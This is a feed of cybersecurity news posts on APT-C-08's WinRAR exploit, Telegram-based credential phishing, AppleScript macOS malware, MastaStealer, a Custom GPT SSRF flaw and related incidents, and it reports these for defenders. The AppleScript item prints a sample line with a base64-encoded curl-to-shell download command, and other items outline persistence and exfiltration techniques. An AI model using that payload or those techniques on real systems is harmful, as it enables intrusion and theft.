• The advanced persistent threat group APT-C-08, also known as Manlinghua or BITTER, has launched a sophisticated campaign targeting government organizations across South Asia by exploiting a critical directory traversal vulnerability in WinRAR.

    Security researchers have identified the group’s first operational use of CVE-2025-6218, a flaw affecting WinRAR versions 7.11 and earlier that allows attackers to breach file system boundaries and execute malicious code on compromised systems.

    APT-C-08 maintains established relationships with South Asian governments and has historically focused on stealing sensitive information from government agencies, the military-industrial complex, overseas institutions, and universities.

    The threat group has demonstrated proficiency in weaponizing malicious documents as attack entry points, meticulously crafting socially engineered payloads designed to bypass security awareness.

    This latest campaign represents a significant escalation, leveraging a vulnerability that remains difficult to patch due to WinRAR’s inconsistent update mechanisms across enterprise environments.

    Security analysts and researchers identified the malware campaign by discovering weaponized RAR archives containing deceptively named files, such as “Provision of Information for Sectoral for AJK.rar.”

    The malicious archive exploits CVE-2025-6218 by leveraging specially crafted file paths that contain spaces after directory traversal sequences, a technique that circumvents WinRAR’s path normalization.

    When victims extract the archive, the exploit deposits a malicious Normal. dotm macro file into the Windows template directory at C:\Users[username]\AppData\Roaming\Microsoft\Templates, establishing persistence through Microsoft Word’s automatic template loading mechanism.

    Infection Mechanism and Code Execution

    The attack chain demonstrates a sophisticated understanding of Windows system architecture.

    Upon extraction, the malicious Normal.dotm file (MD5: 4bedd8e2b66cc7d64b293493ef5b8942) runs when the victim opens any Word document, triggering VBA macros that execute the “net use” command to map remote directories to the local machine.

    Subsequently, the macro launches winnsc.exe from the remote server, establishing command execution capabilities.

    This two-stage infection approach ensures that opening the initial document triggers the infection without raising suspicion, allowing operators to maintain stealth while establishing persistent remote access.

    The exploit’s low difficulty, combined with its high success rate, has prompted security communities to recommend immediate patching of all WinRAR installations and implementing application allowlisting to restrict macro execution in Microsoft Office templates.

    Organizations handling sensitive government information should prioritize threat detection monitoring for suspicious network mapping activities and macro-based indicators of compromise.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post APT-C-08 Hackers Exploiting WinRAR Vulnerability to Attack Government Organizations appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated phishing campaign has emerged, targeting organizations across Central and Eastern Europe by impersonating legitimate global brands to deceive users into surrendering their login credentials.

    The attack utilizes self-contained HTML files delivered as email attachments, eliminating the need for external server hosting or suspicious URLs that traditional security systems typically detect.

    Once opened, these attachments present convincing fake login pages for brands including Microsoft 365, Adobe, WeTransfer, FedEx, and DHL, creating a seamless user experience designed to bypass conventional email security controls.

    The attack methodology demonstrates a clear understanding of regional business practices.

    Threat actors distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations through RFC-compliant filenames such as RFQ_4460-INQUIRY.HTML.

    This targeted approach focuses on industries with regular procurement workflows, including agriculture, automotive, construction, and education sectors, primarily in the Czech Republic, Slovakia, Hungary, and Germany.

    Cyble security analysts identified that the campaign’s success relies on embedded JavaScript within HTML attachments that captures credentials and transmits them directly to attacker-controlled Telegram bots rather than traditional command-and-control servers.

    Upon execution, victims encounter a carefully replicated login interface displaying brand-authentic branding with blurred background images for added legitimacy.

    Campaign Overview

    The credential capture mechanism functions by reading form field values and constructing API requests to send stolen data directly through the Telegram Bot API.

    Technical analysis reveals two distinct implementation approaches among analyzed samples. The first variant implements CryptoJS AES encryption for obfuscation while capturing email addresses, passwords, IP addresses, and user-agent information before redirecting victims to legitimate company domains.

    Campaign Overview (Source - Cyble)
    Campaign Overview (Source – Cyble)

    The second sample employs more advanced anti-forensics techniques, blocking keyboard combinations including F12, Ctrl+U/S/C/A/X, and right-click context menus to prevent code inspection and analysis.

    The exfiltration function demonstrates technical sophistication by utilizing the native Fetch API for cleaner code implementation rather than jQuery dependencies.

    The JavaScript constructs POST requests containing harvested credentials sent via HTTPS to api.telegram.org/bot endpoints with hardcoded bot tokens and chat IDs embedded directly in the payload.

    This approach deliberately avoids suspicious network patterns while maintaining operational resilience through decentralized bot infrastructure.

    Organizations should prioritize deploying HTML attachment controls and implementing content inspection policies to block or sandbox potentially malicious HTML files before delivery to end users.

    Security teams are advised to hunt for api.telegram.org POST activity originating from client systems and conduct retroactive threat hunts for identified indicators to assess whether credentials have been compromised.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Phishing Attack Leverages Popular Brands to Harvest Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Since Apple removed the popular “right-click and open” Gatekeeper override in August 2024, threat actors have shifted their tactics to deliver malware on macOS. Among emerging techniques, attackers are increasingly leveraging AppleScript (.scpt) files to bypass security controls and distribute credential stealers often disguised as legitimate software updates from popular applications such as Zoom and […]

    The post AppleScript Used to Deliver macOS Malware Disguised as Zoom & Teams Updates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SecureVibes, an innovative AI-native security system designed for modern applications, has unveiled a comprehensive vulnerability scanner that leverages Anthropic’s Claude AI to deliver intelligent security analysis across eleven programming languages. The tool represents a significant advancement in automated vulnerability detection by combining a multi-agent architecture with sophisticated threat modeling capabilities. Advanced AI-Powered Security Analysis The […]

    The post SecureVibes Introduces Multi-Language Vulnerability Scanner Powered by Claude AI appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft has confirmed it is investigating a significant issue affecting Microsoft Teams for Education, which is particularly impacting users’ ability to access critical features such as assignments and grades.

    The problem, which initially appeared limited to administrators in Europe, has since expanded to affect all users with educational accounts worldwide potentially.

    The outage stems from backend infrastructure challenges within Teams’ processing systems. Microsoft first acknowledged the issue on November 12, 2025, stating that affected admins in the European region were unable to open or load assignments and grades.

    This disruption has broader implications for educators and students relying on the platform for daily collaboration and academic management.

    As the investigation progressed, Microsoft updated its status to reveal that the issue extends beyond admins to any user holding a Microsoft Teams Educational account.

    This escalation underscores the platform’s centrality in modern remote learning environments, where even brief downtimes can halt lesson planning, grading, and student interactions.

    To address the problem, Microsoft engineers are actively restarting key backend components that power Teams’ services. These restarts aim to restore processing capabilities and mitigate the ongoing impact.

    Users experiencing difficulties are directed to the Microsoft 365 admin center for real-time updates under incident identifier TM1185134. There, detailed timelines, affected services, and mitigation steps are available, helping IT administrators track resolution efforts.

    The timing of this incident is particularly unfortunate, coinciding with the mid-semester period when educational institutions heavily depend on digital tools.

    Microsoft Teams, part of the broader Microsoft 365 suite, serves millions of users globally, with education-specific features integrated deeply into school workflows.

    While the company has not specified a root cause, such as a software glitch, server overload, or external factor, past Teams outages have often involved high-traffic scenarios or configuration errors in cloud infrastructure.

    Microsoft emphasizes that its teams are working around the clock to resolve the issue, with preliminary signs of improvement expected as restarts complete.

    In the interim, affected users are advised to monitor the admin center and consider alternative tools for urgent tasks. This event highlights ongoing challenges in maintaining reliable cloud-based educational platforms, especially amid rising demands post-pandemic.

    As more details emerge under TM1185134, educators and IT professionals should prepare contingency plans to minimize academic disruptions. Microsoft has committed to a full post-incident review to prevent future occurrences.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Investigating Teams Issue that Disables Users from Opening Apps appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Windows LNK files remain a preferred vector for attackers seeking to establish initial access on target systems. Recently, security researchers identified a sophisticated MastaStealer campaign that exploits these shortcut files to deliver a full-featured C2 beacon while simultaneously turning off critical endpoint protections. The infection begins with a spear-phishing email containing a ZIP archive with […]

    The post MastaStealer Exploits Windows LNK to Launch PowerShell and Bypass Defender appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Every day, security teams face the same problem—too many risks, too many alerts, and not enough time. You fix one issue, and three more show up. It feels like you’re always one step behind. But what if there was a smarter way to stay ahead—without adding more work or stress? Join The Hacker News and Bitdefender for a free cybersecurity webinar to learn about a new approach called Dynamic Attack

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.

    Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, attackers have identified and weaponized a new delivery mechanism using compiled AppleScript files with deceptive naming conventions.

    These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.

    The emerging threat centers on .scpt files that open directly in Script Editor.app by default, creating an attractive attack surface for threat actors.

    When users double-click these files, the application displays a user-friendly interface with social engineering prompts encouraging execution.

    The malware operators strategically embed malicious code after extensive blank lines to hide the actual payload from casual inspection.

    By simply clicking the “Run” button or pressing Cmd+R, users inadvertently execute the script even if it has been flagged by Gatekeeper quarantine protections, effectively circumventing Apple’s security mechanisms.

    Fake Chrome Update Example (Source - Pepe Berba)
    Fake Chrome Update Example (Source – Pepe Berba)

    Security analysts at Moonlock Labs and Pepe Berba identified this technique gaining prominence in recent months, discovering sophisticated campaigns that previously appeared in advanced persistent threat operations.

    Pepe Berba noted that while AppleScript files themselves are not new, the proliferation of samples using this technique represents a concerning trend, particularly as commodity malware families like MacSync Stealer and Odyssey Stealer have adopted the methodology.

    This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.

    Technical structure

    The technical structure of these scripts employs several clever deception tactics.

    A sample analyzed reveals AppleScript code such as set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" followed by do shell script "open -g " & quoted form of teamsSDKURL.

    Execution flow (Source - Pepe Berba)
    Execution flow (Source – Pepe Berba)

    This command structure opens malicious URLs in the background while presenting legitimate-looking update prompts to the user.

    The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”

    The persistence and detection evasion capabilities of these attacks deserve particular attention.

    Many .scpt files currently maintain zero detections on VirusTotal, providing attackers with significant operational runway before security vendors implement detection signatures.

    The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.

    This attack vector presents a significant challenge for macOS security, as it exploits user trust in familiar application names while leveraging native system tools that legitimate users regularly interact with.

    Organizations must educate users about verifying software updates through official channels and implement endpoint detection solutions capable of monitoring AppleScript execution patterns.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A cybersecurity researcher has uncovered a server-side request forgery (SSRF) vulnerability in OpenAI’s ChatGPT. The flaw, hidden in the Custom GPTs feature, allowed attackers to potentially access sensitive cloud infrastructure secrets, including Azure management API tokens. Disclosed through OpenAI’s bug bounty program, the issue was swiftly patched, but it underscores the persistent dangers of SSRF […]

    The post Hackers Exploit SSRF Flaw in Custom GPTs to Steal ChatGPT Secrets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Widespread reports suggest major law enforcement operation targeting notorious malware infrastructure has disrupted the Rhadamanthys stealer control panel, prompting urgent security alerts. In a significant development within the cybersecurity community, reports indicate that German law enforcement authorities may have seized control of the main Rhadamanthys stealer infrastructure, marking a potentially significant blow against one of […]

    The post Rhadamanthys Stealer Servers Reportedly Seized; Admin Urges Immediate Reinstallation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶